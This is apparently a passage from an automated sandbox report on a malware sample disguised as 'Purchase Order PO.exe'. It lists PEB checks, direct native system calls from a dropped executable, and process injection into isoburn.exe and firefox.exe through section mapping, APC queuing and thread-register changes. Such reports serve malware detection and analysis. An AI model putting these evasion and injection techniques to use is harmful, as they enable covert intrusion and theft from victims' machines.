                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8CB7E mov eax, dword ptr fs:[00000030h]2_2_01A8CB7E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3EB50 mov eax, dword ptr fs:[00000030h]2_2_01B3EB50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B38B42 mov eax, dword ptr fs:[00000030h]2_2_01B38B42
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26B40 mov eax, dword ptr fs:[00000030h]2_2_01B26B40
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B26B40 mov eax, dword ptr fs:[00000030h]2_2_01B26B40
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B5AB40 mov eax, dword ptr fs:[00000030h]2_2_01B5AB40
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98AA0 mov eax, dword ptr fs:[00000030h]2_2_01A98AA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A98AA0 mov eax, dword ptr fs:[00000030h]2_2_01A98AA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE6AA4 mov eax, dword ptr fs:[00000030h]2_2_01AE6AA4
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9EA80 mov eax, dword ptr fs:[00000030h]2_2_01A9EA80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64A80 mov eax, dword ptr fs:[00000030h]2_2_01B64A80
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC8A90 mov edx, dword ptr fs:[00000030h]2_2_01AC8A90
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACAAEE mov eax, dword ptr fs:[00000030h]2_2_01ACAAEE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACAAEE mov eax, dword ptr fs:[00000030h]2_2_01ACAAEE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE6ACC mov eax, dword ptr fs:[00000030h]2_2_01AE6ACC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE6ACC mov eax, dword ptr fs:[00000030h]2_2_01AE6ACC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AE6ACC mov eax, dword ptr fs:[00000030h]2_2_01AE6ACC
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A90AD0 mov eax, dword ptr fs:[00000030h]2_2_01A90AD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC4AD0 mov eax, dword ptr fs:[00000030h]2_2_01AC4AD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC4AD0 mov eax, dword ptr fs:[00000030h]2_2_01AC4AD0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ABEA2E mov eax, dword ptr fs:[00000030h]2_2_01ABEA2E
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCA24 mov eax, dword ptr fs:[00000030h]2_2_01ACCA24
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB4A35 mov eax, dword ptr fs:[00000030h]2_2_01AB4A35
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB4A35 mov eax, dword ptr fs:[00000030h]2_2_01AB4A35
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B1CA11 mov eax, dword ptr fs:[00000030h]2_2_01B1CA11
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0CA72 mov eax, dword ptr fs:[00000030h]2_2_01B0CA72
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B0CA72 mov eax, dword ptr fs:[00000030h]2_2_01B0CA72
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCA6F mov eax, dword ptr fs:[00000030h]2_2_01ACCA6F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCA6F mov eax, dword ptr fs:[00000030h]2_2_01ACCA6F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCA6F mov eax, dword ptr fs:[00000030h]2_2_01ACCA6F
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B3EA60 mov eax, dword ptr fs:[00000030h]2_2_01B3EA60
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0A5B mov eax, dword ptr fs:[00000030h]2_2_01AA0A5B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AA0A5B mov eax, dword ptr fs:[00000030h]2_2_01AA0A5B
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A96A50 mov eax, dword ptr fs:[00000030h]2_2_01A96A50
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AC6DA0 mov eax, dword ptr fs:[00000030h]2_2_01AC6DA0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB8DBF mov eax, dword ptr fs:[00000030h]2_2_01AB8DBF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01AB8DBF mov eax, dword ptr fs:[00000030h]2_2_01AB8DBF
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B58DAE mov eax, dword ptr fs:[00000030h]2_2_01B58DAE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B58DAE mov eax, dword ptr fs:[00000030h]2_2_01B58DAE
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B64DAD mov eax, dword ptr fs:[00000030h]2_2_01B64DAD
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCDB1 mov ecx, dword ptr fs:[00000030h]2_2_01ACCDB1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCDB1 mov eax, dword ptr fs:[00000030h]2_2_01ACCDB1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01ACCDB1 mov eax, dword ptr fs:[00000030h]2_2_01ACCDB1
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8CDEA mov eax, dword ptr fs:[00000030h]2_2_01A8CDEA
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A8CDEA mov eax, dword ptr fs:[00000030h]2_2_01A8CDEA
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B30DF0 mov eax, dword ptr fs:[00000030h]2_2_01B30DF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01B30DF0 mov eax, dword ptr fs:[00000030h]2_2_01B30DF0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9ADE0 mov eax, dword ptr fs:[00000030h]2_2_01A9ADE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9ADE0 mov eax, dword ptr fs:[00000030h]2_2_01A9ADE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9ADE0 mov eax, dword ptr fs:[00000030h]2_2_01A9ADE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9ADE0 mov eax, dword ptr fs:[00000030h]2_2_01A9ADE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeCode function: 2_2_01A9ADE0 mov eax, dword ptr fs:[00000030h]2_2_01A9ADE0
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeMemory written: C:\Users\user\Desktop\Purchase Order PO.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: NULL target: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeSection loaded: NULL target: C:\Windows\SysWOW64\isoburn.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeThread register set: target process: 1148Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeThread APC queued: target process: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeProcess created: C:\Users\user\Desktop\Purchase Order PO.exe "C:\Users\user\Desktop\Purchase Order PO.exe"Jump to behavior
                Source: C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exeProcess created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: QfgdvbjddZ.exe, 00000006.00000000.2053668559.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000006.00000002.4169975849.0000000001820000.00000002.00000001.00040000.00000000.sdmp, QfgdvbjddZ.exe, 00000008.00000002.4170102889.0000000001870000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Users\user\Desktop\Purchase Order PO.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Purchase Order PO.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
